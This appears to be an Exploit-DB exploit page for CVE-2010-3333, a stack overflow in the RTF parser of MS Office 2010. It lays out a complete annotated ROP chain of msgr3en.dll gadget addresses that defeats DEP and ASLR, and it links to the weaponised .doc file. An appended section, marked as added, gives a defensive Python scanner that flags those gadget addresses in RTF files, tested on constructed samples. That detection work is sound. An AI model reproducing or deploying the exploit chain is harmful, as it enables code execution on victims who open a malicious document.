# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333

# This is the exploit I wrote for Abysssec "The Arashi" article.
# It gracefully bypasses DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASLR Bypass" :>
# unfortunately msgr3en.dll loads a few seconds after opening Office,
# so you just need to open Office, and then open the exploit after a few seconds and see a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
# http://www.exploit-db.com/docs/17469.pdf
#
# me : twitter.com/ponez
# also check here for Persian docs of these methods and more :
# http://www.0days.ir/article/
#
# and the Rop :

3F2CB9E0    POP ECX                                          RETN    # HeapCreate() IAT = 3F10115C
3F389CA5    MOV EAX,DWORD PTR DS:[ECX]                       RETN    # EAX == HeapCreate() Address
3F39AFCF    CALL EAX                                         RETN    # Call HeapCreate() and Create an Executable Heap :D
                                                                     # after this call, EAX contains our Heap Address.
0x3F2CB9E0  POP ECX                                          RETN    # pop 0x00008000 into ECX
0x3F39CB46  ADD EAX,ECX  POP ESI                             RETN    # add ECX to EAX and instead of calling HeapAlloc,
                                                                     # now EAX points to the RWX Heap :D
0x3F2CB9E0  POP ECX                                          RETN    # pop 0x3F3B3DC0 into ECX, it is a writable address.
0x3F2233CC  MOV DWORD PTR DS:[ECX],EAX                       RETN    # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for further use ;)
0x3F2D59DF  POP EAX  ADD DWORD PTR DS:[EAX],ESP              RETN    # pop 0x3F3B3DC4 into EAX , it is a writable address with zero!
                                                                     # then we add ESP to the Zero, which results in storing ESP into that address,
                                                                     # we need the ESP address for copying shellcode ( which is stored in the Stack ),
                                                                     # and we have to get it dynamically at run-time, now with my tricky instruction, we have it!
0x3F2F18CC  POP EAX                                          RETN    # pop 0x3F3B3DC4 ( ESP address ) into EAX
0x3F2B745E  MOV ECX,DWORD PTR DS:[EAX]                       RETN    # now ECX points to nearly the offset of the Stack.
0x3F39795E  POP EDX                                          RETN    # pop 0x00000024 into EDX
0x3F39CB44  ADD ECX,EDX  ADD EAX,ECX  POP ESI                RETN    # add 0x24 to ECX ( Stack address )
0x3F398267  MOV EAX,ECX                                      RETN    # EAX = ECX ; )
0x3F3A16DE  MOV DWORD PTR DS:[ECX],EAX  XOR EAX,EAX  POP ESI RETN    # mov EAX ( Stack Address + 24 = Current ESP value ) into the current Stack Location,
                                                                     # and then pop it into ESI ! now ESI points where the shellcode is stored in the stack :D
0x3F398267  MOV EAX,ECX                                      RETN    # EAX = ECX ; )
3F2CB9E0    POP ECX                                          RETN    # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
0x3F389CA5  MOV EAX,DWORD PTR DS:[ECX]                       RETN    # now EAX points to our RWX Heap
0x3F2B0A7C  XCHG EAX,EDI                                     RETN 4  # EDI = Our RWX Heap Address
3F2CB9E0    POP ECX                                          RETN    # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
0x3F389CA5  MOV EAX,DWORD PTR DS:[ECX]                       RETN    # now EAX points to our RWX Heap
0x3F38BEFB  ADD AL,58                                        RETN    # just skip some junk ; )
3F2CB9E0    POP ECX                                          RETN    # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy length )
3F3441B4    REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]  POP EDI  POP ESI  RETN  # Copy shellcode from stack into RWX Heap
3F39AFCF    CALL EAX                                         RETN    # KABOOM !!!

Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17474.doc (cve-2011-3333_exploit.doc)
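Added detection example (not part of the original exploit or the Abysssec article): a Python scanner that decodes the hex runs inside an RTF file and flags the msgr3en.dll gadget addresses listed above when they appear as little-endian dwords, which is how a chain like this ends up in the file. The RTF samples are constructed, and the \objdata wrapper and the three-distinct-gadget threshold are my assumptions, not something the page states.

```python
import re
import struct

# Gadget addresses from the msgr3en.dll ROP chain listed on this page (CVE-2010-3333).
# The page's bypass relies on that DLL loading at a fixed base, so they make a usable signature.
IKAZUCHI_GADGETS = {
    0x3F2CB9E0: "POP ECX / RETN",
    0x3F389CA5: "MOV EAX,[ECX] / RETN",
    0x3F39AFCF: "CALL EAX / RETN",
    0x3F39CB46: "ADD EAX,ECX / POP ESI / RETN",
    0x3F2233CC: "MOV [ECX],EAX / RETN",
    0x3F2D59DF: "POP EAX / ADD [EAX],ESP / RETN",
    0x3F3441B4: "REP MOVSD / POP EDI / POP ESI / RETN",
}
MIN_DISTINCT = 3  # assumption: three distinct chain gadgets in one file is not a coincidence
# A run of at least 8 hex byte pairs, tolerating the line breaks RTF writers insert.
HEX_RUN = re.compile(rb"(?:[0-9A-Fa-f]{2}\s*){8,}")

def decode_hex_runs(data):
    """Yield (run_offset, nibble_shift, decoded_bytes) for each hex run, at both alignments."""
    for m in HEX_RUN.finditer(data):
        digits = re.sub(rb"\s+", b"", m.group(0))
        for shift in (0, 1):                      # the run may start mid-byte in the text
            chunk = digits[shift:]
            chunk = chunk[: len(chunk) & ~1]       # drop a trailing odd nibble
            yield m.start(), shift, bytes.fromhex(chunk.decode("ascii"))

def scan_rtf(data):
    """Return [(run_offset, address, description)] for every known gadget dword found."""
    hits = []
    for offset, _shift, blob in decode_hex_runs(data):
        for i in range(len(blob) - 3):
            (dword,) = struct.unpack_from("<I", blob, i)
            if dword in IKAZUCHI_GADGETS:
                hits.append((offset, dword, IKAZUCHI_GADGETS[dword]))
    return hits

def verdict(data):
    """Return (suspicious, hits); suspicious once MIN_DISTINCT chain gadgets appear."""
    hits = scan_rtf(data)
    return len({addr for _, addr, _ in hits}) >= MIN_DISTINCT, hits

def _le_hex(addr):
    return struct.pack("<I", addr).hex().encode("ascii")   # the chain is stored little-endian
# Constructed samples (not real exploit files): one carrying four chain dwords, one clean.
CONSTRUCTED_HIT = (b"{\\rtf1\\ansi\\deff0{\\object\\objemb{\\*\\objdata\r\n" + b"41" * 16 + b"\r\n"
                   + b"".join(_le_hex(a) for a in (0x3F2CB9E0, 0x00008000, 0x3F39CB46, 0x3F39AFCF))
                   + b"\r\n}}}")
CONSTRUCTED_CLEAN = b"{\\rtf1\\ansi\\deff0{\\object\\objemb{\\*\\objdata 0105000002000000" + b"00" * 24 + b"}}}"
```

Run `verdict(open(path, "rb").read())` over a mailbox or share of RTF/DOC-named files; the hit list tells you which gadgets matched, which is useful when tuning the threshold against your own clean corpus.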